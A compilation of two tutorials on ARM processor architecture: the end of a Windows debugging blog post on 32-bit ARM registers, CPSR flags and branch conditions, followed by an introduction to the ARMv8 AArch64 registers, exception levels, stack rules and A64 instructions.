R11 – Frame Pointer (EBP on x86).
CPSR – Current Program Status Register (Flags on x86).
In Windbg all but r11 will be labeled appropriately for you. So you may be asking why r11 is not labeled “fp” in the debugger. That is because r11 is only used as a frame pointer when you are calling a non-leaf subroutine. The way it works is this: when a call to a non-leaf subroutine is made, the called subroutine pushes the value of the previous frame pointer (in r11) to the stack (right after the lr) and then r11 is set to point to this location in the stack, so eventually we end up with a linked list of frame pointers in the stack that easily enables the construction of the call stack. The frame pointer is not pushed to the stack in leaf functions. We will discuss leaf functions later. CPSR (Current Program Status Register) Now we need to understand a little about the CPSR register.
Here is the bit breakdown: [TABLE] [TR] [TD]31 [/TD] [TD]30 [/TD] [TD]29 [/TD] [TD]28 [/TD] [TD]27 [/TD] [TD]26 [/TD] [TD]25 [/TD] [TD]24 [/TD] [TD]23 [/TD] [TD]22 [/TD] [TD]21 [/TD] [TD]20 [/TD] [TD]19 [/TD] [TD]18 [/TD] [TD]17 [/TD] [TD]16 [/TD] [TD]15 [/TD] [TD]14 [/TD] [TD]13 [/TD] [TD]12 [/TD] [TD]11 [/TD] [TD]10 [/TD] [TD]9 [/TD] [TD]8 [/TD] [TD]7 [/TD] [TD]6 [/TD] [TD]5 [/TD] [TD]4 [/TD] [TD]3 [/TD] [TD]2 [/TD] [TD]1 [/TD] [TD]0 [/TD] [/TR] [TR] [TD]N [/TD] [TD]Z [/TD] [TD]C [/TD] [TD]V [/TD] [TD]Q [/TD] [TD=colspan: 2]IT [/TD] [TD]J [/TD] [TD=colspan: 4]Reserved [/TD] [TD=colspan: 4]GE [/TD] [TD=colspan: 6]IT [/TD] [TD]E [/TD] [TD]A [/TD] [TD]I [/TD] [TD]F [/TD] [TD]T [/TD] [TD=colspan: 5]M [/TD] [/TR] [/TABLE]
Bits [31:28] – Condition Code Flags
N – bit 31 – If this bit is set, the result was negative. If the bit is cleared, the result was positive or zero.
Z – bit 30 – If set, this bit indicates the result was zero or the values compared were equal. If it is cleared, the value is non-zero or the compared values are not equal.
C – bit 29 – If this bit is set, the instruction resulted in a carry condition, e.g. adding two unsigned values resulted in a value too large to be stored.
V – bit 28 – If this bit is set, the instruction resulted in an overflow condition, e.g. an overflow when adding two signed values.
Instruction variants ending with ‘s’ set the condition codes (mov/movs).
E – bit 9 – Endianness (big = 1/little = 0)
T – bit 5 – Set if executing Thumb instructions
M – bits [4:0] – CPU Mode (User 10000/Supervisor 10011)
So why do I need to know about the CPSR (Current Program Status Register)? You will need to know where some of these bits are because of how some of the assembly instructions affect these flags. An example of this: ADD will add two registers together, or add an immediate value to a register. However, it will not affect the flags. ADDS will do the same as ADD, but it does affect the flags.
MOV will allow you to move a value into a register, or a value between registers. This is not like x86/x64: MOV will not let you read or write memory. It does not affect the flags. MOVS does the same thing as MOV, but it does affect the flags. I hope you are seeing a trend here. There are instructions that look the same, but if they end in “S” then you need to know that they will affect the flags. I am not going to list all of those assembly instructions here. Those are already listed in the ARM Architecture Reference Manual, ARMv7-A and ARMv7-R edition. So now we have an idea of what can set the flags. Now we need to understand what the flags are used for. They are mainly used for branching instructions. Here is an example:
003a11d2 429a cmp r2,r3
003a11d4 d104 bne |MyApp!FirstFunc+0x28 (003a11e0)|
The first instruction in this code (cmp) compares the value stored in register r2 to the value stored in register r3. This comparison instruction sets or resets the Z flag in the CPSR register. The second instruction is a branch instruction (b) with the condition code ne, which means that if the result of the previous comparison was that the values are not equal (the CPSR flag Z is zero), then branch to the address MyApp!FirstFunc+0x28 (003a11e0). Otherwise execution continues with the next instruction. There are a few compare instructions. “cmp” subtracts two register values, sets the flags, and discards the result. “cmn” adds two register values, sets the flags, and discards the result. “tst” does a bitwise AND of two register values, sets the flags, and discards the result. There is even an If Then (it) instruction. I am not going to discuss that one here as I have never seen it in any of the Windows code. So is “bne” the only branch instruction? No. There are a lot of them.
Here is a table of the condition suffixes that can be seen beside “b”, and what they check in the CPSR register: [TABLE] [TR] [TD]Mnemonic Extension [/TD] [TD]Meaning (Integer) [/TD] [TD]Condition Flags (in CPSR) [/TD] [/TR] [TR] [TD]EQ [/TD] [TD]Equal [/TD] [TD]Z==1 [/TD] [/TR] [TR] [TD]NE [/TD] [TD]Not Equal [/TD] [TD]Z==0 [/TD] [/TR] [TR] [TD]MI [/TD] [TD]Negative (Minus) [/TD] [TD]N==1 [/TD] [/TR] [TR] [TD]PL [/TD] [TD]Positive or Zero (Plus) [/TD] [TD]N==0 [/TD] [/TR] [TR] [TD]HI [/TD] [TD]Unsigned higher [/TD] [TD]C==1 and Z==0 [/TD] [/TR] [TR] [TD]LS [/TD] [TD]Unsigned lower or same [/TD] [TD]C==0 or Z==1 [/TD] [/TR] [TR] [TD]GE [/TD] [TD]Signed greater than or equal [/TD] [TD]N==V [/TD] [/TR] [TR] [TD]LT [/TD] [TD]Signed less than [/TD] [TD]N!=V [/TD] [/TR] [TR] [TD]GT [/TD] [TD]Signed greater than [/TD] [TD]Z==0 and N==V [/TD] [/TR] [TR] [TD]LE [/TD] [TD]Signed less than or equal [/TD] [TD]Z==1 or N!=V [/TD] [/TR] [TR] [TD]VS [/TD] [TD]Overflow [/TD] [TD]V==1 [/TD] [/TR] [TR] [TD]VC [/TD] [TD]No overflow [/TD] [TD]V==0 [/TD] [/TR] [TR] [TD]CS [/TD] [TD]Carry set [/TD] [TD]C==1 [/TD] [/TR] [TR] [TD]CC [/TD] [TD]Carry clear [/TD] [TD]C==0 [/TD] [/TR] [TR] [TD]None (AL) [/TD] [TD]Execute always [/TD] [TD] [/TD] [/TR] [/TABLE] Floating Point Registers As mentioned earlier, the processor also has to have the ISA extensions of VFP (Hardware Floating Point) and NEON (128-bit SIMD Architecture). Here is what they are. Floating Point: there are 16 64-bit registers (d0-d15) that are overlaid with 32 32-bit registers (s0-s31). There are varieties of the ARM processor that have 32 64-bit registers and 64 32-bit registers. Windows 8 will support both the 16 and 32 register variants. You have to be careful when using these, because if you access unaligned floats you may cause an exception. SIMD (NEON): the SIMD (NEON) extension adds 16 128-bit registers (q0-q15) on top of the floating point registers.
So if you reference Q0 it is the same as referencing D0-D1 or S0-S1-S2-S3. In part 2 we will discuss how Windows utilizes this processor. Source: Understanding ARM Assembly Part 1 - Ntdebugging Blog - Site Home - MSDN Blogs
  23. [h=1]Introduction to ARMv8 64-bit Architecture[/h] April 9, 2014 By PnUic [h=2]Introduction[/h] The ARM architecture is a Reduced Instruction Set Computer (RISC) architecture; indeed, ARM originally stood for “Acorn RISC Machine” and now stands for “Advanced RISC Machines”. In recent years, with the spread of smartphones and tablets, ARM processors have become very popular, mostly because of their lower cost and better power efficiency compared to other architectures such as CISC: Complex Instruction Set Computer (CISC) processors, like the x86, have a rich instruction set capable of doing complex things with a single instruction. Such processors often have significant amounts of internal logic that decode machine instructions to sequences of internal operations (microcode). RISC architectures, in contrast, have a smaller number of more general purpose instructions, that might be executed with significantly fewer transistors, making the silicon cheaper and more power efficient. Like other RISC architectures, ARM cores have a large number of general-purpose registers and many instructions execute in a single cycle. It has simple addressing modes, where all load/store addresses can be determined from register contents and instruction fields. A peculiarity of RISC architectures (ARM, MIPS, …): the load/store architecture only allows memory to be accessed by load and store operations, and all values for an operation need to be loaded from memory and be present in registers, so operations such as “add reg,[address]” are not permitted! Another difference from CISC architectures: when a Branch with Link is executed (the “call” operation on Intel architectures), the return address is stored in a special register and not on the stack. One thing the ARM architecture lacks is multi-threading support, which is present in many other architectures such as Intel and MIPS.
Because AArch32 (32-bit) is already well documented (ARM on Wikipedia; Cambridge University – Operating System Development), I decided to talk only about AArch64 (64-bit). [h=2]Processors:[/h] A short list of ARM processors:
Classic or Cortex-A: with DSP, Floating Point, TrustZone and Jazelle extensions. ARMv5 and ARM6 (2001)
Cortex-M: ARM Thumb®-2 technology, which provides excellent code density. With Thumb-2 technology, the Cortex-M processors support a fundamental base of 16-bit Thumb instructions, extended to include more powerful 32-bit instructions. First multi-core. (2004)
Cortex-R: ARMv7, deeply pipelined micro-architecture, flexible Multi-Processor Core (MPCore) configurations: Symmetric Multi-Processing (SMP) & Asymmetric Multi-Processing (AMP), LPAE extension.
Cortex-A50: ARMv8-A 64-bit with load-acquire and store-release features, which are an excellent match for the C++11, C11 and Java memory models. (2011)
[h=3]Extensions[/h] Every new version of ARM brings new extensions; the v8 architecture has these:
Jazelle is a Java hardware/software accelerator: “ARM Jazelle DBX (Direct Bytecode eXecution) technology for direct bytecode execution of Java”. On the software side, Jazelle MobileVM is a complete multi-tasking JVM, engineered to provide high performance multi-tasking in a very small memory footprint
Floating Point: for floating point operations
NEON: the ARM 128-bit SIMD (Single Instruction, Multiple Data) engine, and DSP: the 32-bit SIMD engine, useful for linear algebra operations
Cryptographic Extension: an extension of the SIMD support that operates on the vector register file. It provides instructions for the acceleration of encryption and decryption to support the following: AES, SHA1, SHA2-256.
TrustZone: a system-wide approach to security for a wide array of client and server computing platforms, including payment protection technology, digital rights management, BYOD, and a host of secured enterprise solutions
Virtualization Extensions: together with the Large Physical Address Extension (LPAE), they enable the efficient implementation of virtual machine hypervisors for ARM architecture compliant processors. The virtualization extensions provide the basis for ARM architecture compliant processors to address the needs of both client and server devices for the partitioning and management of complex software environments into virtual machines. The Large Physical Address Extension provides the means for each of the software environments to utilize efficiently the available physical memory when handling large amounts of data
[h=2]Architectures[/h] AArch64 is the ARMv8-A 64-bit execution state, which uses 31 64-bit general purpose registers (R0-R30), and a 64-bit program counter (PC), stack pointer (SP), and exception link registers (ELR). It provides 32 128-bit registers for SIMD vector and scalar floating-point support (V0-V31). A64 instructions have a fixed length of 32 bits and are always little-endian. AArch32 is the ARMv8-A 32-bit execution state, which uses 13 32-bit general purpose registers (R0-R12), a 32-bit program counter (PC), stack pointer (SP), and link register (LR). It provides 32 64-bit registers for Advanced SIMD vector and scalar floating-point support. The AArch32 execution state provides a choice of two instruction sets, A32 (ARM) and T32 (Thumb-2). Operation in AArch32 state is compatible with ARMv7-A operation. T32: 16-bit instructions are decompressed transparently to full 32-bit ARM instructions in real time without performance loss. Thumb-2 technology made Thumb a mixed (32- and 16-bit) length instruction set [h=2]Data types[/h] Data types are simply these: Byte: 8 bits. Halfword: 16 bits. Word: 32 bits. Doubleword: 64 bits. Quadword: 128 bits.
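As a quick illustration of the sizes just listed, here is a minimal C sketch that maps them onto fixed-width types. The typedef names (a64_byte and so on) and the helper width_in_bits are made up for this example and are not part of any ARM header; the quadword is modelled as two 64-bit halves, which assumes the compiler adds no padding to that struct.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical typedef names; only the widths come from the list above. */
typedef uint8_t  a64_byte;        /* Byte:       8 bits  */
typedef uint16_t a64_halfword;    /* Halfword:   16 bits */
typedef uint32_t a64_word;        /* Word:       32 bits */
typedef uint64_t a64_doubleword;  /* Doubleword: 64 bits */

/* Quadword: 128 bits, modelled as two 64-bit halves. */
typedef struct {
    uint64_t lo;
    uint64_t hi;
} a64_quadword;

/* Width of an object in bits, given its size in bytes. */
static size_t width_in_bits(size_t size_in_bytes)
{
    assert(size_in_bytes <= SIZE_MAX / CHAR_BIT);  /* guard against overflow */
    return size_in_bytes * CHAR_BIT;
}
```

Calling width_in_bits(sizeof(a64_word)), for instance, gives back the width from the list, which is a cheap sanity check when porting code between toolchains.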
The architecture also supports the following floating-point data types: Half-precision floating-point formats. Single-precision floating-point format. Double-precision floating-point format. To keep this short guide from getting too long, I don’t cover the floating-point assembly instructions; if you want to know more about them, see the ARM Architecture Reference Manual. [h=2]Exception levels[/h] There are four exception levels, which replace the 8 different processor modes. They work like the rings in Intel architectures, forming a privilege hierarchy:
EL0 is the least privileged level; indeed it is called unprivileged execution. Applications run here.
EL1: the OS kernel can run here.
EL2: provides support for virtualization of Non-secure operation. A hypervisor can run here.
EL3: provides support for switching between two Security states, Secure state and Non-secure state. A secure monitor can run here.
When executing in AArch64 state, execution can move between Exception levels only on taking an exception or on returning from an exception. Each of the 4 privilege levels has 3 private banked registers: the Exception Link Register, Stack Pointer and Saved PSR. [h=3]Interprocessing: AArch64 <=> AArch32[/h] Interprocessing is the term used to describe moving between the AArch64 and AArch32 Execution states. The Execution state can change only on a change of Exception level. This means that the Execution state can change only on taking an exception to a higher Exception level, or returning from an exception to a lower Exception level. On taking an exception to a higher Exception level, the Execution state either: Remains unchanged. Changes from AArch32 state to AArch64 state. On returning from an exception to a lower Exception level, the Execution state either: Remains unchanged. Changes from AArch64 state to AArch32 state.
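The interprocessing rules above are easy to get backwards, so here is a small C sketch that encodes them as a predicate. It is only a model of the rules as stated in the text; the type exec_state and the function transition_allowed are hypothetical names invented for this example, not anything defined by ARM.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical model of the two Execution states. */
typedef enum { AARCH32, AARCH64 } exec_state;

/*
 * Returns true if moving from (from_el, from_state) to (to_el, to_state)
 * is consistent with the rules in the text:
 *  - the state can change only together with the Exception level;
 *  - going up (taking an exception): unchanged, or AArch32 -> AArch64;
 *  - going down (exception return):  unchanged, or AArch64 -> AArch32.
 */
static bool transition_allowed(int from_el, exec_state from_state,
                               int to_el, exec_state to_state)
{
    assert(from_el >= 0 && from_el <= 3);
    assert(to_el >= 0 && to_el <= 3);

    if (to_state == from_state)
        return true;                       /* "remains unchanged" is always fine */
    if (to_el > from_el)
        return from_state == AARCH32;      /* only 32 -> 64 on the way up */
    if (to_el < from_el)
        return from_state == AARCH64;      /* only 64 -> 32 on the way down */
    return false;                          /* same level: state cannot change */
}
```

One consequence that falls out of the predicate: a 64-bit kernel at EL1 can host 32-bit applications at EL0, but a 32-bit kernel cannot host 64-bit applications.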
[h=2]The A64 Registers[/h] A64 has 31 general-purpose (integer) registers, plus the zero register and the current stack pointer register. Here are all the registers: [TABLE] [TR] [TD]Wn[/TD] [TD]32 bits[/TD] [TD]General-purpose register: n can be 0-30[/TD] [/TR] [TR] [TD]Xn[/TD] [TD]64 bits[/TD] [TD]General-purpose register: n can be 0-30[/TD] [/TR] [TR] [TD]WZR[/TD] [TD]32 bits[/TD] [TD]Zero register[/TD] [/TR] [TR] [TD]XZR[/TD] [TD]64 bits[/TD] [TD]Zero register[/TD] [/TR] [TR] [TD]WSP[/TD] [TD]32 bits[/TD] [TD]Current stack pointer[/TD] [/TR] [TR] [TD]SP[/TD] [TD]64 bits[/TD] [TD]Current stack pointer[/TD] [/TR] [/TABLE] How the registers should be used by compilers and programmers:
r30 (LR): The Link Register, used as the subroutine link register; it stores the return address when Branch with Link operations are performed.
r29 (FP): The Frame Pointer
r19…r28: Callee-saved registers
r18: The Platform Register, if needed; otherwise a temporary register.
r17 (IP1): The second intra-procedure-call temporary register (can be used by call veneers and PLT code); at other times may be used as a temporary register.
r16 (IP0): The first intra-procedure-call scratch register (can be used by call veneers and PLT code); at other times may be used as a temporary register.
r9…r15: Temporary registers
r8: Indirect result location register
r0…r7: Parameter/result registers
Access to the PC (program counter) is limited: it is not a general-purpose register, and only a few instructions touch it implicitly, for example branches such as BL modify it and ADR reads it. [h=2]The use of Stack[/h] The stack implementation is full-descending: on a push the stack pointer is decremented, i.e. the stack grows towards lower addresses. Another feature is that the stack must be quad-word aligned: SP mod 16 = 0.
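To make “full-descending” and “SP mod 16 = 0” concrete, here is a toy C model of a stack that pushes and pops register pairs, roughly what “stp x, y, [sp, -16]!” and “ldp x, y, [sp], 16” do. Everything in it (sim_stack, STACK_WORDS, the function names, the simulated addresses) is invented for the sketch; it models only the pointer arithmetic, not real memory.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define STACK_WORDS 64  /* hypothetical size: 64 x 8 bytes = 512 bytes */

typedef struct {
    uint64_t base;              /* lowest simulated address of the region */
    uint64_t sp;                /* current stack pointer (simulated address) */
    uint64_t mem[STACK_WORDS];  /* backing storage, one slot per doubleword */
} sim_stack;

/* True when sp satisfies the "SP mod 16 = 0" rule. */
static bool sp_is_aligned(uint64_t sp)
{
    return (sp & 15u) == 0;
}

/* An empty full-descending stack starts with SP just past the highest slot. */
static void stack_init(sim_stack *s, uint64_t base)
{
    assert(sp_is_aligned(base));
    memset(s->mem, 0, sizeof s->mem);
    s->base = base;
    s->sp = base + STACK_WORDS * 8u;
}

/* Push: decrement SP by 16 first, then store the pair at the new SP. */
static bool push_pair(sim_stack *s, uint64_t first, uint64_t second)
{
    if (s->sp - s->base < 16)
        return false;                       /* no room left */
    s->sp -= 16;
    s->mem[(s->sp - s->base) / 8] = first;
    s->mem[(s->sp - s->base) / 8 + 1] = second;
    return true;
}

/* Pop: load the pair at SP, then increment SP by 16. */
static bool pop_pair(sim_stack *s, uint64_t *first, uint64_t *second)
{
    if (s->sp + 16 > s->base + STACK_WORDS * 8u)
        return false;                       /* stack is empty */
    *first = s->mem[(s->sp - s->base) / 8];
    *second = s->mem[(s->sp - s->base) / 8 + 1];
    s->sp += 16;
    return true;
}
```

Because registers are always pushed two at a time here, SP moves in steps of 16 and the alignment rule holds after every operation, which is one reason A64 code favours load/store pair for saving registers.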
A64 instructions can use the stack pointer only in a limited number of cases:
Load/Store instructions use the current stack pointer as the base address. When stack alignment checking is enabled by system software and the base register is SP, the current stack pointer must be initially quadword aligned, that is, it must be aligned to 16 bytes. Misalignment generates a Stack Alignment fault.
Add and subtract data processing instructions, in their immediate and extended register forms, use the current stack pointer as a source register or the destination register or both.
Logical data processing instructions in their immediate form use the current stack pointer as the destination register.
[h=2]Process State[/h] PSTATE (process state, CPSR on AArch32) holds process state related information. Its flags are changed by compare instructions, for example, so the processor uses it to decide whether or not to take a branch (a jump in Intel terminology). [TABLE] [TR] [TD]N[/TD] [TD]Negative condition flag[/TD] [/TR] [TR] [TD]Z[/TD] [TD]Zero condition flag[/TD] [/TR] [TR] [TD]C[/TD] [TD]Carry condition flag[/TD] [/TR] [TR] [TD]V[/TD] [TD]oVerflow condition flag[/TD] [/TR] [TR] [TD]D[/TD] [TD]Debug mask bit [AArch64 only][/TD] [/TR] [TR] [TD]A[/TD] [TD]Asynchronous abort mask bit[/TD] [/TR] [TR] [TD]I[/TD] [TD]IRQ mask bit[/TD] [/TR] [TR] [TD]F[/TD] [TD]FIQ mask bit[/TD] [/TR] [TR] [TD]SS[/TD] [TD]Software step bit[/TD] [/TR] [TR] [TD]IL[/TD] [TD]Illegal execution state bit[/TD] [/TR] [TR] [TD]EL[/TD] [TD]Exception Level (see above)[/TD] [/TR] [TR] [TD]nRW[/TD] [TD]not Register Width: 0=64, 1=32[/TD] [/TR] [TR] [TD]SP[/TD] [TD]Stack pointer select: 0=SP0, 1=SPx [AArch64 only][/TD] [/TR] [TR] [TD]Q[/TD] [TD]Cumulative saturation flag [AArch32 only][/TD] [/TR] [TR] [TD]GE[/TD] [TD]Greater than or Equal flags [AArch32 only][/TD] [/TR] [TR] [TD]IT[/TD] [TD]If-then execution state bits [AArch32 only][/TD] [/TR] [TR] [TD]J[/TD] [TD]J execution state bit [AArch32 only][/TD] [/TR] [TR] [TD]T[/TD] [TD]T32 execution state bit [AArch32 only][/TD] [/TR] [TR] [TD]E[/TD] [TD]Endian execution state bit [AArch32 only][/TD] [/TR] [TR] [TD]M[/TD] [TD]Mode field (see above) [AArch32 only][/TD] [/TR] [/TABLE] The first four flags are the Condition flags (NZCV), and they are the ones most used by the processor: N: Negative condition flag. If the result is regarded as a two’s complement signed integer, then the PE sets N to 1 if the result is negative, and sets N to 0 if it is positive or zero. Z: Zero condition flag.
Set to 1 if the result of the instruction is zero, and to 0 otherwise. A result of zero often indicates an equal result from a comparison. C: Carry condition flag. Set to 1 if the instruction results in a carry condition, for example an unsigned overflow that is the result of an addition. V: Overflow condition flag. Set to 1 if the instruction results in an overflow condition, for example a signed overflow that is the result of an addition. [h=2]Condition code suffixes[/h] These suffixes are used by the conditional branch instruction; here is a table to help understand what they mean: [TABLE] [TR] [TH]Suffix[/TH] [TH]Flags[/TH] [TH]Meaning[/TH] [/TR] [TR] [TD]EQ[/TD] [TD]Z set[/TD] [TD]Equal[/TD] [/TR] [TR] [TD]NE[/TD] [TD]Z clear[/TD] [TD]Not equal[/TD] [/TR] [TR] [TD]CS or HS[/TD] [TD]C set[/TD] [TD]Higher or same (unsigned >= )[/TD] [/TR] [TR] [TD]CC or LO[/TD] [TD]C clear[/TD] [TD]Lower (unsigned < )[/TD] [/TR] [TR] [TD]MI[/TD] [TD]N set[/TD] [TD]Negative[/TD] [/TR] [TR] [TD]PL[/TD] [TD]N clear[/TD] [TD]Positive or zero[/TD] [/TR] [TR] [TD]VS[/TD] [TD]V set[/TD] [TD]Overflow[/TD] [/TR] [TR] [TD]VC[/TD] [TD]V clear[/TD] [TD]No overflow[/TD] [/TR] [TR] [TD]HI[/TD] [TD]C set and Z clear[/TD] [TD]Higher (unsigned >)[/TD] [/TR] [TR] [TD]LS[/TD] [TD]C clear or Z set[/TD] [TD]Lower or same (unsigned <=)[/TD] [/TR] [TR] [TD]GE[/TD] [TD]N and V the same[/TD] [TD]Signed >=[/TD] [/TR] [TR] [TD]LT[/TD] [TD]N and V differ[/TD] [TD]Signed <[/TD] [/TR] [TR] [TD]GT[/TD] [TD]Z clear, and N and V the same[/TD] [TD]Signed >[/TD] [/TR] [TR] [TD]LE[/TD] [TD]Z set, or N and V differ[/TD] [TD]Signed <=[/TD] [/TR] [TR] [TD]AL[/TD] [TD]Any[/TD] [TD]Always. This suffix is normally omitted.[/TD] [/TR] [/TABLE] When you see <cond> next to an assembly instruction, you can use one of these suffixes. [h=2]Instruction Set[/h] The A64 encoding structure breaks down into the following functional groups: A miscellaneous group of branch instructions, exception generating instructions, and system instructions.
Data processing instructions associated with general-purpose registers. These instructions are supported by two functional groups, depending on whether the operands: are all held in registers; or include an operand with a constant immediate value.
Load and store instructions associated with the general-purpose register file and the SIMD and floating-point register file.
SIMD and scalar floating-point data processing instructions that operate on the SIMD and floating-point registers (not covered here).
[h=3]What instructions are not present compared to AArch32:[/h]
Conditional execution operations, because: The A64 instruction set does not include the concept of predicated or conditional execution. Benchmarking shows that modern branch predictors work well enough that predicated execution of instructions does not offer sufficient benefit to justify its significant use of opcode space, and its implementation cost in advanced implementations.
Load Multiple instructions, which load from memory a subset, or possibly all, of the general-purpose registers and the PC; so there are no push, pop, ldmia, etc.: these are replaced by load/store pair.
Coprocessor instructions
[h=3]Branches & Exception[/h] Conditional branch Conditional branches change the flow of execution depending on the current state of the condition flags or the value in a general-purpose register. [TABLE] [TR] [TD]B<cond>[/TD] [TD]Branch conditionally[/TD] [TD]B.<cond> <label>[/TD] [/TR] [TR] [TD]CBNZ[/TD] [TD]Compare and branch if nonzero[/TD] [TD]CBNZ <Wt|Xt>, <label>[/TD] [/TR] [TR] [TD]CBZ[/TD] [TD]Compare and branch if zero[/TD] [TD]CBZ <Wt|Xt>, <label>[/TD] [/TR] [/TABLE] Unconditional branch [TABLE] [TR] [TD]B[/TD] [TD]Branch unconditionally[/TD] [TD]B <label>[/TD] [/TR] [TR] [TD]BL[/TD] [TD]Branch with link[/TD] [TD]BL <label>[/TD] [/TR] [/TABLE] The BL instruction writes the address of the sequentially following instruction, used for the return (see RET), to general-purpose register X30.
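To tie the conditional branch to the condition code suffixes, here is a C sketch of how a B.<cond> decision could be modelled: one function computes the NZCV flags the way a 64-bit CMP (a subtraction whose result is discarded) would, and another evaluates a suffix against those flags. The names nzcv, cond, cmp_flags and cond_holds are invented for the example; the flag rules follow the standard A64 definitions (for a subtraction, C set means no borrow).

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* The four condition flags held in PSTATE. */
typedef struct { bool n, z, c, v; } nzcv;

/* Condition code suffixes (CS is also written HS, CC is also written LO). */
typedef enum {
    COND_EQ, COND_NE, COND_CS, COND_CC, COND_MI, COND_PL, COND_VS, COND_VC,
    COND_HI, COND_LS, COND_GE, COND_LT, COND_GT, COND_LE, COND_AL
} cond;

/* Flags as set by "CMP a, b", i.e. the subtraction a - b on 64-bit values. */
static nzcv cmp_flags(uint64_t a, uint64_t b)
{
    uint64_t r = a - b;
    nzcv f;
    f.n = (r >> 63) != 0;                        /* result negative as signed */
    f.z = (r == 0);                              /* operands were equal */
    f.c = (a >= b);                              /* carry set means no borrow */
    f.v = (((a ^ b) & (a ^ r)) >> 63) != 0;      /* signed overflow */
    return f;
}

/* True if a branch with this suffix would be taken for the given flags. */
static bool cond_holds(cond cc, nzcv f)
{
    assert(cc >= COND_EQ && cc <= COND_AL);
    switch (cc) {
    case COND_EQ: return f.z;
    case COND_NE: return !f.z;
    case COND_CS: return f.c;
    case COND_CC: return !f.c;
    case COND_MI: return f.n;
    case COND_PL: return !f.n;
    case COND_VS: return f.v;
    case COND_VC: return !f.v;
    case COND_HI: return f.c && !f.z;
    case COND_LS: return !f.c || f.z;
    case COND_GE: return f.n == f.v;
    case COND_LT: return f.n != f.v;
    case COND_GT: return !f.z && f.n == f.v;
    case COND_LE: return f.z || f.n != f.v;
    case COND_AL: return true;
    }
    return false;
}
```

Comparing the all-ones value with 1 shows why signed and unsigned suffixes both exist: the same flags make LT hold (minus one is less than one) and HI hold (the largest unsigned value is higher than one).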
Unconditional branch (register)
[TABLE]
[TR] [TD]BLR[/TD] [TD]Branch with link to register[/TD] [TD]BLR <Xn>[/TD] [/TR]
[TR] [TD]BR[/TD] [TD]Branch to register[/TD] [TD]BR <Xn>[/TD] [/TR]
[TR] [TD]RET[/TD] [TD]Return from subroutine[/TD] [TD]RET {<Xn>}, where Xn is the register holding the address to branch to; defaults to X30 if absent.[/TD] [/TR]
[/TABLE]
Exception generating
[*]HVC: Generate exception targeting Exception level 2
[*]SMC: Generate exception targeting Exception level 3
[*]SVC: Generate exception targeting Exception level 1
Other instructions
[*]NOP: No operation
[*]WFE: Wait for event
[*]WFI: Wait for interrupt
[*]SEV: Send event
[*]SEVL: Send event local
[h=3]Load/Store register[/h]
This class contains many instructions for moving data of different sizes (byte, halfword and word), but I show only four of them, just enough to understand the idea: two that move a single register and two that move a pair of registers. First, though, I have to describe how memory is accessed.
[h=4]Load/Store addressing modes[/h]
This part is important for understanding the ARM addressing modes; the three most used are:
[*][base{, #imm}] : Base plus offset addressing means that the address is the value in the 64-bit base register plus an offset. Example: ldrsw x0, [x29,76] // load a signed word from x29+76 into x0
[*][base, #imm]! : Pre-indexed addressing means that the address is the sum of the value in the 64-bit base register and an offset, and the address is then written back to the base register. Example: stp x29, x30, [sp, -80]! // store x29 and x30 on the stack at sp-80, and set sp = sp-80
[*][base], #imm : Post-indexed addressing means that the address is the value in the 64-bit base register, and the sum of the address and the offset is then written back to the base register. Example: ldp x29, x30, [sp], 80 // load x29 and x30 from the stack at sp, then set sp = sp+80
Now I can describe the load/store instructions. Whatever the addressing mode, I show only a few examples.
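Before moving on, the difference between the three addressing modes can be modelled in a few lines of C. This is only a sketch: base stands for the Xn or SP register, imm for the signed offset, and the function names are made up for this illustration.

```c
#include <stdint.h>

/* Each function returns the address that the load/store would access. */

/* [base, #imm] : the base register is left untouched. */
uint64_t addr_offset(const uint64_t *base, int64_t imm)
{
    return *base + (uint64_t)imm;
}

/* [base, #imm]! : the base is updated first, then used as the address. */
uint64_t addr_pre_index(uint64_t *base, int64_t imm)
{
    *base += (uint64_t)imm;
    return *base;
}

/* [base], #imm : the old base is the address; the base is updated afterwards. */
uint64_t addr_post_index(uint64_t *base, int64_t imm)
{
    uint64_t addr = *base;
    *base += (uint64_t)imm;
    return addr;
}
```

With sp = 0x1000, addr_pre_index(&sp, -80) models stp x29, x30, [sp, -80]!: it accesses 0xFB0 and leaves sp at 0xFB0. A later addr_post_index(&sp, 80) models ldp x29, x30, [sp], 80: it accesses 0xFB0 again and restores sp to 0x1000.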
Single Register
Load a register from memory, or store a register to memory.
[*]ldr: Load register. It works with:
Register offset: LDR <Xt>, [<Xn|SP>, <R><m>{, <extend> {<amount>}}]
Immediate offset (post-indexed form): LDR <Xt>, [<Xn|SP>], #<simm>
PC-relative literal: LDR <Xt>, <label>
[*]str: Store register. It works with:
Register offset: STR <Xt>, [<Xn|SP>, <R><m>{, <extend> {<amount>}}]
Immediate offset (post-indexed form): STR <Xt>, [<Xn|SP>], #<simm>
<simm> is a signed immediate byte offset, in the range -256 to 255.
Pair of Registers
Load or store the two specified registers at the memory address held in Xn or SP.
[*]ldp: Load pair: LDP <Xt1>, <Xt2>, [<Xn|SP>], #<imm>
[*]stp: Store pair: STP <Xt1>, <Xt2>, [<Xn|SP>], #<imm>
<imm> is a signed immediate byte offset, a multiple of 8 in the range -512 to 504.
[h=3]Data processing – immediate[/h]
Arithmetic (immediate)
[TABLE]
[TR] [TD]ADD[/TD] [TD]Add[/TD] [TD]ADD <Xd|SP>, <Xn|SP>, #<imm>{, <shift>}; Rd = Rn + shift(imm)[/TD] [/TR]
[TR] [TD]ADDS[/TD] [TD]Add and set flags[/TD] [TD][/TD] [/TR]
[TR] [TD]SUB[/TD] [TD]Subtract[/TD] [TD]SUB <Xd|SP>, <Xn|SP>, #<imm>{, <shift>}; Rd = Rn - shift(imm)[/TD] [/TR]
[TR] [TD]SUBS[/TD] [TD]Subtract and set flags[/TD] [TD][/TD] [/TR]
[TR] [TD]CMP[/TD] [TD]Compare[/TD] [TD]CMP <Xn|SP>, #<imm>{, <shift>}[/TD] [/TR]
[TR] [TD]CMN[/TD] [TD]Compare negative[/TD] [TD][/TD] [/TR]
[/TABLE]
Where: <imm> is an unsigned 12-bit immediate in the range 0 to 4095, and <shift> is the optional left shift applied to it, either LSL #0 (the default) or LSL #12. The general shift operators LSL (logical shift left), ASR (arithmetic shift right) and LSR (logical shift right), which accept an immediate shift <amount> in the range 0 to one less than the register width of the instruction, inclusive, belong to the shifted-register forms.
